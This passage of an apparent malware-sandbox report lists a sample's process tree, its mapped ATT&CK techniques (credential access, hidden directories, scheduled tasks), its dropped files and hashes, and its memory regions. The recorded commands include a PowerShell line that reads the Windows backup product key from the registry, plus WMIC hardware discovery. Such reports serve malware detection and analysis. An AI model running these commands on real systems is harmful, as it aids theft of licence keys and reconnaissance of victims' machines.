                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                        3⤵
                                                          PID:4432
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic path win32_VideoController get name
                                                            4⤵
                                                            • Detects videocard installed
                                                            PID:2240
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                          3⤵
                                                            PID:2308
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              4⤵
                                                                PID:3744
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:4460
                                                        • C:\Windows\System32\WaaSMedicAgent.exe
                                                          C:\Windows\System32\WaaSMedicAgent.exe 397c93f0e5fbbaad31a6cd820ce843f7 Qdf7Y8krnEeM7oCZcyWEOg.0.1.0.0.0
                                                          1⤵
                                                            PID:2112

                                                          Network

                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                          Execution

                                                          Command and Scripting Interpreter

                                                          1
                                                          T1059

                                                          PowerShell

                                                          1
                                                          T1059.001

                                                          Scheduled Task/Job

                                                          1
                                                          T1053

                                                          Persistence

                                                          Scheduled Task/Job

                                                          1
                                                          T1053

                                                          Privilege Escalation

                                                          Scheduled Task/Job

                                                          1
                                                          T1053

                                                          Defense Evasion

                                                          Hide Artifacts

                                                          1
                                                          T1564

                                                          Hidden Files and Directories

                                                          1
                                                          T1564.001

                                                          Credential Access

                                                          Unsecured Credentials

                                                          2
                                                          T1552

                                                          Credentials In Files

                                                          2
                                                          T1552.001

                                                          Discovery

                                                          System Information Discovery

                                                          2
                                                          T1082

                                                          Process Discovery

                                                          1
                                                          T1057

                                                          Query Registry

                                                          1
                                                          T1012

                                                          Collection

                                                          Data from Local System

                                                          2
                                                          T1005

                                                          Command and Control

                                                          Web Service

                                                          1
                                                          T1102

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                            Filesize

                                                            2KB

                                                            MD5

                                                            d85ba6ff808d9e5444a4b369f5bc2730

                                                            SHA1

                                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                                            SHA256

                                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                            SHA512

                                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            944B

                                                            MD5

                                                            3a6bad9528f8e23fb5c77fbd81fa28e8

                                                            SHA1

                                                            f127317c3bc6407f536c0f0600dcbcf1aabfba36

                                                            SHA256

                                                            986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05

                                                            SHA512

                                                            846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            1KB

                                                            MD5

                                                            9d9e705ca093c4764faefe905fe84345

                                                            SHA1

                                                            c5e62bb784f8a9e8d25809dc80cc1302f38988d5

                                                            SHA256

                                                            e613602ca5bb32b5c80fd0108e4bda25a38dba0edd72fdc1b20ac02ab8b697a8

                                                            SHA512

                                                            a31bae5e43a9a666cdd817d6494ca64915abc6f887a9e00b01d5ce413768f3baee9053810e27d94172fa4c803f366f9fce62a06a2d4cd070708481e2338e8311

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            1KB

                                                            MD5

                                                            88be3bc8a7f90e3953298c0fdbec4d72

                                                            SHA1

                                                            f4969784ad421cc80ef45608727aacd0f6bf2e4b

                                                            SHA256

                                                            533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

                                                            SHA512

                                                            4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            1KB

                                                            MD5

                                                            7511c81925750deb7ad1b9b80eea8a8d

                                                            SHA1

                                                            6ea759b3cbd243ae11435c6d6c5ced185eb01f49

                                                            SHA256

                                                            5b49723a7773f2fe1f6093236e7b9b2c546f0873635d02346cb39535811234fa

                                                            SHA512

                                                            5f7e69316d39525d137a7a833f8c746ceef8f1b2295348393fb3244cca8b962fbaad0f7da49da453fe97e2c49b1f41f06138111ac5ff97fdc33c300350ec3a1b

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                            Filesize

                                                            64B

                                                            MD5

                                                            894afb4ff3cd7ee1f69400e936f8fc9d

                                                            SHA1

                                                            aa0eb6ac58f8997940c1aa2e6f6c42d7c3837e51

                                                            SHA256

                                                            20948b37924c58362ffc5d1472667b53c6d7fc865ad541c901cebf41d04a03c9

                                                            SHA512

                                                            449494468d267f9689a277ce858dac7dfda04ceb568f60170645582fd631901a9ef780da8e420cba8a297edc11cd63a874e3429b95cf90e7261d2b9ab8850e98

                                                          • C:\Users\Admin\AppData\Local\Temp\IrcIf.zip
                                                            Filesize

                                                            430KB

                                                            MD5

                                                            db3c6186000d224576754296ba038099

                                                            SHA1

                                                            3df3d57bc98dcba6aa63f1675bf65ddaeeb3a91d

                                                            SHA256

                                                            7e3525ce77895bb20e1eb2cd842a25c6e56a599a057c22f8ebb6e3a4fe484643

                                                            SHA512

                                                            65d6ed7f092b80c37418246260965ee3a8eb4831d16a58c02490df73c57dd8f95a5368093de96f5c5d3b1a9ca57384ce5a54df6c12dd2240adca1f7f71404b8d

                                                          • C:\Users\Admin\AppData\Local\Temp\RES7148.tmp
                                                            Filesize

                                                            1KB

                                                            MD5

                                                            8e55b5ddae556672276a2d8586f0176d

                                                            SHA1

                                                            7eecfa455b3f5e88ccf60fff6a86b3afc72bd6b9

                                                            SHA256

                                                            23e98d3120a65ac254f74f442a4ae44467261c5741f6555a8fe88ed14eb5d06c

                                                            SHA512

                                                            1f1bfade5895601ec922e32bbc4d5f536f34e14384bc13073711877d6e94441e999963d5dfdcb685846b2487fbd854e944ed40dcc55ae2edda11cdd50458d243

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\VCRUNTIME140.dll
                                                            Filesize

                                                            106KB

                                                            MD5

                                                            49c96cecda5c6c660a107d378fdfc3d4

                                                            SHA1

                                                            00149b7a66723e3f0310f139489fe172f818ca8e

                                                            SHA256

                                                            69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

                                                            SHA512

                                                            e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\_bz2.pyd
                                                            Filesize

                                                            48KB

                                                            MD5

                                                            c413931b63def8c71374d7826fbf3ab4

                                                            SHA1

                                                            8b93087be080734db3399dc415cc5c875de857e2

                                                            SHA256

                                                            17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293

                                                            SHA512

                                                            7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\_ctypes.pyd
                                                            Filesize

                                                            58KB

                                                            MD5

                                                            00f75daaa7f8a897f2a330e00fad78ac

                                                            SHA1

                                                            44aec43e5f8f1282989b14c4e3bd238c45d6e334

                                                            SHA256

                                                            9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f

                                                            SHA512

                                                            f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\_decimal.pyd
                                                            Filesize

                                                            106KB

                                                            MD5

                                                            e3fb8bf23d857b1eb860923ccc47baa5

                                                            SHA1

                                                            46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0

                                                            SHA256

                                                            7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3

                                                            SHA512

                                                            7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\_hashlib.pyd
                                                            Filesize

                                                            35KB

                                                            MD5

                                                            b227bf5d9fec25e2b36d416ccd943ca3

                                                            SHA1

                                                            4fae06f24a1b61e6594747ec934cbf06e7ec3773

                                                            SHA256

                                                            d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7

                                                            SHA512

                                                            c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\_lzma.pyd
                                                            Filesize

                                                            85KB

                                                            MD5

                                                            542eab18252d569c8abef7c58d303547

                                                            SHA1

                                                            05eff580466553f4687ae43acba8db3757c08151

                                                            SHA256

                                                            d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9

                                                            SHA512

                                                            b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\_queue.pyd
                                                            Filesize

                                                            25KB

                                                            MD5

                                                            347d6a8c2d48003301032546c140c145

                                                            SHA1

                                                            1a3eb60ad4f3da882a3fd1e4248662f21bd34193

                                                            SHA256

                                                            e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192

                                                            SHA512

                                                            b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\_socket.pyd
                                                            Filesize

                                                            43KB

                                                            MD5

                                                            1a34253aa7c77f9534561dc66ac5cf49

                                                            SHA1

                                                            fcd5e952f8038a16da6c3092183188d997e32fb9

                                                            SHA256

                                                            dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f

                                                            SHA512

                                                            ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\_sqlite3.pyd
                                                            Filesize

                                                            56KB

                                                            MD5

                                                            1a8fdc36f7138edcc84ee506c5ec9b92

                                                            SHA1

                                                            e5e2da357fe50a0927300e05c26a75267429db28

                                                            SHA256

                                                            8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882

                                                            SHA512

                                                            462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\_ssl.pyd
                                                            Filesize

                                                            65KB

                                                            MD5

                                                            f9cc7385b4617df1ddf030f594f37323

                                                            SHA1

                                                            ebceec12e43bee669f586919a928a1fd93e23a97

                                                            SHA256

                                                            b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6

                                                            SHA512

                                                            3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\base_library.zip
                                                            Filesize

                                                            1.4MB

                                                            MD5

                                                            32ede00817b1d74ce945dcd1e8505ad0

                                                            SHA1

                                                            51b5390db339feeed89bffca925896aff49c63fb

                                                            SHA256

                                                            4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a

                                                            SHA512

                                                            a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\blank.aes
                                                            Filesize

                                                            126KB

                                                            MD5

                                                            54008ee0063071dfdc10d86aabab14f0

                                                            SHA1

                                                            4af91a36c90af8da35900d33e48c6c7f78107650

                                                            SHA256

                                                            da4d1eb15376df7c1584bad70b07ef3b57fccfd821e662d50203ac8b57488cc5

                                                            SHA512

                                                            917a4e8504ebc45deaf51b8ca1c366d86dcfdb3d8e59edc7c3e11be82d9776a2d6b6938298590063c240775c4b16dc4618ec1dfb674de0998afab61af9d32a43

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\blank.aes
                                                            Filesize

                                                            126KB

                                                            MD5

                                                            726d66b3c5cd6e41576f73a71a1d8be1

                                                            SHA1

                                                            f332b34f547fe3d418c12a29b42472a0d1810d87

                                                            SHA256

                                                            a7c80c9b7dcab7d8e178a4344930a82e07f7e54b190112d8965e12cb07619be3

                                                            SHA512

                                                            ed57dd471c5c3d1cccfda5096918edf92862accf0ec94dd22159f2effa32b2306994eaa847e1bfcc2998911e07268a788a3d505ddb033a07330cf532d2922cf2

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\bound.blank
                                                            Filesize

                                                            1.2MB

                                                            MD5

                                                            011010c38b6a79c838686ce4c2ba8c3a

                                                            SHA1

                                                            370ffcd3b1898f86a945fc2b3719894d425c85f6

                                                            SHA256

                                                            878be4ecc70063d4f39e009799e0deb183db0dfb14047ca0f92faf80bedca3ac

                                                            SHA512

                                                            ce1d27bba1eb2037df0b8127df5e9e1c2cb920e147ef5e2a260cef57eee3e134164c68c86d3f655b4400736504fdeeb13a4994a4c1edd90d2079e021ff66062d

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\libcrypto-3.dll
                                                            Filesize

                                                            1.6MB

                                                            MD5

                                                            78ebd9cb6709d939e4e0f2a6bbb80da9

                                                            SHA1

                                                            ea5d7307e781bc1fa0a2d098472e6ea639d87b73

                                                            SHA256

                                                            6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e

                                                            SHA512

                                                            b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\libffi-8.dll
                                                            Filesize

                                                            29KB

                                                            MD5

                                                            08b000c3d990bc018fcb91a1e175e06e

                                                            SHA1

                                                            bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                            SHA256

                                                            135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                            SHA512

                                                            8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\libssl-3.dll
                                                            Filesize

                                                            223KB

                                                            MD5

                                                            bf4a722ae2eae985bacc9d2117d90a6f

                                                            SHA1

                                                            3e29de32176d695d49c6b227ffd19b54abb521ef

                                                            SHA256

                                                            827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147

                                                            SHA512

                                                            dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\python311.dll
                                                            Filesize

                                                            1.6MB

                                                            MD5

                                                            5f6fd64ec2d7d73ae49c34dd12cedb23

                                                            SHA1

                                                            c6e0385a868f3153a6e8879527749db52dce4125

                                                            SHA256

                                                            ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967

                                                            SHA512

                                                            c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\rar.exe
                                                            Filesize

                                                            615KB

                                                            MD5

                                                            9c223575ae5b9544bc3d69ac6364f75e

                                                            SHA1

                                                            8a1cb5ee02c742e937febc57609ac312247ba386

                                                            SHA256

                                                            90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                            SHA512

                                                            57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\rarreg.key
                                                            Filesize

                                                            456B

                                                            MD5

                                                            4531984cad7dacf24c086830068c4abe

                                                            SHA1

                                                            fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                            SHA256

                                                            58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                            SHA512

                                                            00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\select.pyd
                                                            Filesize

                                                            25KB

                                                            MD5

                                                            45d5a749e3cd3c2de26a855b582373f6

                                                            SHA1

                                                            90bb8ac4495f239c07ec2090b935628a320b31fc

                                                            SHA256

                                                            2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876

                                                            SHA512

                                                            c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\sqlite3.dll
                                                            Filesize

                                                            622KB

                                                            MD5

                                                            dbc64142944210671cca9d449dab62e6

                                                            SHA1

                                                            a2a2098b04b1205ba221244be43b88d90688334c

                                                            SHA256

                                                            6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c

                                                            SHA512

                                                            3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI43202\unicodedata.pyd
                                                            Filesize

                                                            295KB

                                                            MD5

                                                            8c42fcc013a1820f82667188e77be22d

                                                            SHA1

                                                            fba7e4e0f86619aaf2868cedd72149e56a5a87d4

                                                            SHA256

                                                            0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2

                                                            SHA512

                                                            3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mkymuyim.oxv.ps1
                                                            Filesize

                                                            60B

                                                            MD5

                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                            SHA1

                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                            SHA256

                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                            SHA512

                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                          • C:\Users\Admin\AppData\Local\Temp\bound.exe
                                                            Filesize

                                                            3.1MB

                                                            MD5

                                                            acbcaba3417ef34cc18bfd174f91b762

                                                            SHA1

                                                            8835ba393cafc2a0a8344040ebf8555772327982

                                                            SHA256

                                                            a7a698ea8f42e341ed237c9e382457bd21de0882b891e4b1842a1f8e724b990b

                                                            SHA512

                                                            c33b0a9380bbc3d2b396035dd1f8eaaced3347f446a7810259704f753e884f193c8d0ac121021969ee46f889e107fcd5269e3c9372e7052e6ca5da12b10a68fd

                                                          • C:\Users\Admin\AppData\Local\Temp\vga030pi\vga030pi.dll
                                                            Filesize

                                                            4KB

                                                            MD5

                                                            dcadcd29722304ff8abff03bcdd55316

                                                            SHA1

                                                            246dcdffe87359575f24bda124edf05153d92368

                                                            SHA256

                                                            825b7b73a084b0e0cf7507fb1f07301b990cefbe55d0a569307f063109ba1eac

                                                            SHA512

                                                            b2cf8719e292b77a60c45fd14b2add96b0efd514a339862ea2ff4460046c9121d06a81d2fb6fc128b699b1fd823d98cf1a732fab197d7e8a8b1deda31ae5428b

                                                          • C:\Users\Admin\AppData\Local\Temp\‍‌‌  ‎    \Display (1).png
                                                            Filesize

                                                            432KB

                                                            MD5

                                                            b630f8309006557a287fa2fb4e20e3ba

                                                            SHA1

                                                            e9f861adf694e91f37d36913a6308678abecf157

                                                            SHA256

                                                            31db28187fe8eb99d705da6885dcff12235a1c7cf47cfdafda56a4b699113c51

                                                            SHA512

                                                            94a3d6f01a24a13ee0c75836ac57d39d9294c652e36bfcd55f6c402227265e5dc751976284c38d274d9ae20112d7afe93fca6845594aa574e21f1f37346e5011

                                                          • C:\Windows\System32\drivers\etc\hosts
                                                            Filesize

                                                            2KB

                                                            MD5

                                                            f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                            SHA1

                                                            e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                            SHA256

                                                            a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                            SHA512

                                                            c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                          • \??\c:\Users\Admin\AppData\Local\Temp\vga030pi\CSCCF7A555153254792B47A439DA72CECC.TMP
                                                            Filesize

                                                            652B

                                                            MD5

                                                            adacfdcd53f2d603a5701b6f0aee1336

                                                            SHA1

                                                            aebc5b407db5db756b95e0a1d53280fb128d5896

                                                            SHA256

                                                            c6630f69a966fc02f1af55e20d631495a5c8af1f522d5a4e7f8df763cc725626

                                                            SHA512

                                                            4ae1d392fcefd86289921ffbc1f08900fe0f106c4d2d57c813a3078c0522a3928f82d5347aa43f7715aea1cc54c4005e52bebed5753c28e2e78fbfe426d5aef7

                                                          • \??\c:\Users\Admin\AppData\Local\Temp\vga030pi\vga030pi.0.cs
                                                            Filesize

                                                            1004B

                                                            MD5

                                                            c76055a0388b713a1eabe16130684dc3

                                                            SHA1

                                                            ee11e84cf41d8a43340f7102e17660072906c402

                                                            SHA256

                                                            8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                            SHA512

                                                            22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                          • \??\c:\Users\Admin\AppData\Local\Temp\vga030pi\vga030pi.cmdline
                                                            Filesize

                                                            607B

                                                            MD5

                                                            1c6d7de513aeee4ad465462485787e5d

                                                            SHA1

                                                            d83d98831c653e13c46d9a1fe7192b6145b001a5

                                                            SHA256

                                                            1267c90b07cf098d030e012c119732e0596e3ce8a7cb143cb1b827b394916f8b

                                                            SHA512

                                                            3be44f202702dceb782d1fae5b05e4cf834fc72c94a33dc455a0bf1d58ea6c00710ac566d30e937f6401360d36af5ca4bdfd8b108f66006509b345b21456e1c9

                                                          • memory/1016-124-0x00007FFF7B8C0000-0x00007FFF7C381000-memory.dmp
                                                            Filesize

                                                            10.8MB

                                                          • memory/1016-84-0x00007FFF7B8C3000-0x00007FFF7B8C5000-memory.dmp
                                                            Filesize

                                                            8KB

                                                          • memory/1016-85-0x0000018AABEA0000-0x0000018AABEC2000-memory.dmp
                                                            Filesize

                                                            136KB

                                                          • memory/1016-86-0x00007FFF7B8C0000-0x00007FFF7C381000-memory.dmp
                                                            Filesize

                                                            10.8MB

                                                          • memory/1016-88-0x00007FFF7B8C0000-0x00007FFF7C381000-memory.dmp
                                                            Filesize

                                                            10.8MB

                                                          • memory/2944-149-0x00007FFF7CB10000-0x00007FFF7CC87000-memory.dmp
                                                            Filesize

                                                            1.5MB

                                                          • memory/2944-60-0x00007FFF8CAB0000-0x00007FFF8CAD3000-memory.dmp
                                                            Filesize

                                                            140KB

                                                          • memory/2944-83-0x00007FFF8C2C0000-0x00007FFF8C3DC000-memory.dmp
                                                            Filesize

                                                            1.1MB

                                                          • memory/2944-275-0x00007FFF7CFF0000-0x00007FFF7D5D9000-memory.dmp
                                                            Filesize

                                                            5.9MB

                                                          • memory/2944-82-0x00007FFF90DD0000-0x00007FFF90DF3000-memory.dmp
                                                            Filesize

                                                            140KB

                                                          • memory/2944-77-0x00007FFF7CFF0000-0x00007FFF7D5D9000-memory.dmp
                                                            Filesize

                                                            5.9MB

                                                          • memory/2944-78-0x00007FFF8CB60000-0x00007FFF8CB74000-memory.dmp
                                                            Filesize

                                                            80KB

                                                          • memory/2944-276-0x00007FFF90DD0000-0x00007FFF90DF3000-memory.dmp
                                                            Filesize

                                                            140KB

                                                          • memory/2944-277-0x00007FFF91E90000-0x00007FFF91E9F000-memory.dmp
                                                            Filesize

                                                            60KB

                                                          • memory/2944-56-0x00007FFF8FBC0000-0x00007FFF8FBED000-memory.dmp
                                                            Filesize

                                                            180KB

                                                          • memory/2944-79-0x00007FFF90950000-0x00007FFF9095D000-memory.dmp
                                                            Filesize

                                                            52KB

                                                          • memory/2944-73-0x00007FFF7C5F0000-0x00007FFF7CB10000-memory.dmp
                                                            Filesize

                                                            5.1MB

                                                          • memory/2944-74-0x0000013E14170000-0x0000013E14690000-memory.dmp
                                                            Filesize

                                                            5.1MB

                                                          • memory/2944-70-0x00007FFF8C640000-0x00007FFF8C70D000-memory.dmp
                                                            Filesize

                                                            820KB

                                                          • memory/2944-68-0x00007FFF8C710000-0x00007FFF8C743000-memory.dmp
                                                            Filesize

                                                            204KB

                                                          • memory/2944-65-0x00007FFF8FB60000-0x00007FFF8FB79000-memory.dmp
                                                            Filesize

                                                            100KB

                                                          • memory/2944-278-0x00007FFF8FBC0000-0x00007FFF8FBED000-memory.dmp
                                                            Filesize

                                                            180KB

                                                          • memory/2944-66-0x00007FFF91670000-0x00007FFF9167D000-memory.dmp
                                                            Filesize

                                                            52KB

                                                          • memory/2944-62-0x00007FFF7CB10000-0x00007FFF7CC87000-memory.dmp
                                                            Filesize

                                                            1.5MB

                                                          • memory/2944-87-0x00007FFF8CAB0000-0x00007FFF8CAD3000-memory.dmp
                                                            Filesize

                                                            140KB

                                                          • memory/2944-58-0x00007FFF90B80000-0x00007FFF90B99000-memory.dmp
                                                            Filesize

                                                            100KB

                                                          • memory/2944-246-0x00007FFF8FB60000-0x00007FFF8FB79000-memory.dmp
                                                            Filesize

                                                            100KB

                                                          • memory/2944-49-0x00007FFF90DD0000-0x00007FFF90DF3000-memory.dmp
                                                            Filesize

                                                            140KB

                                                          • memory/2944-50-0x00007FFF91E90000-0x00007FFF91E9F000-memory.dmp
                                                            Filesize

                                                            60KB

                                                          • memory/2944-289-0x00007FFF7C5F0000-0x00007FFF7CB10000-memory.dmp
                                                            Filesize

                                                            5.1MB

                                                          • memory/2944-26-0x00007FFF7CFF0000-0x00007FFF7D5D9000-memory.dmp
                                                            Filesize

                                                            5.9MB

                                                          • memory/2944-288-0x00007FFF8C2C0000-0x00007FFF8C3DC000-memory.dmp
                                                            Filesize

                                                            1.1MB

                                                          • memory/2944-287-0x00007FFF90950000-0x00007FFF9095D000-memory.dmp
                                                            Filesize

                                                            52KB

                                                          • memory/2944-286-0x00007FFF8CB60000-0x00007FFF8CB74000-memory.dmp
                                                            Filesize

                                                            80KB

                                                          • memory/2944-285-0x00007FFF8C640000-0x00007FFF8C70D000-memory.dmp
                                                            Filesize

                                                            820KB

                                                          • memory/2944-284-0x00007FFF8C710000-0x00007FFF8C743000-memory.dmp
                                                            Filesize

                                                            204KB

                                                          • memory/2944-283-0x00007FFF91670000-0x00007FFF9167D000-memory.dmp
                                                            Filesize

                                                            52KB

                                                          • memory/2944-282-0x00007FFF8FB60000-0x00007FFF8FB79000-memory.dmp
                                                            Filesize

                                                            100KB

                                                          • memory/2944-281-0x00007FFF7CB10000-0x00007FFF7CC87000-memory.dmp
                                                            Filesize

                                                            1.5MB

                                                          • memory/2944-280-0x00007FFF8CAB0000-0x00007FFF8CAD3000-memory.dmp
                                                            Filesize

                                                            140KB

                                                          • memory/2944-279-0x00007FFF90B80000-0x00007FFF90B99000-memory.dmp
                                                            Filesize

                                                            100KB

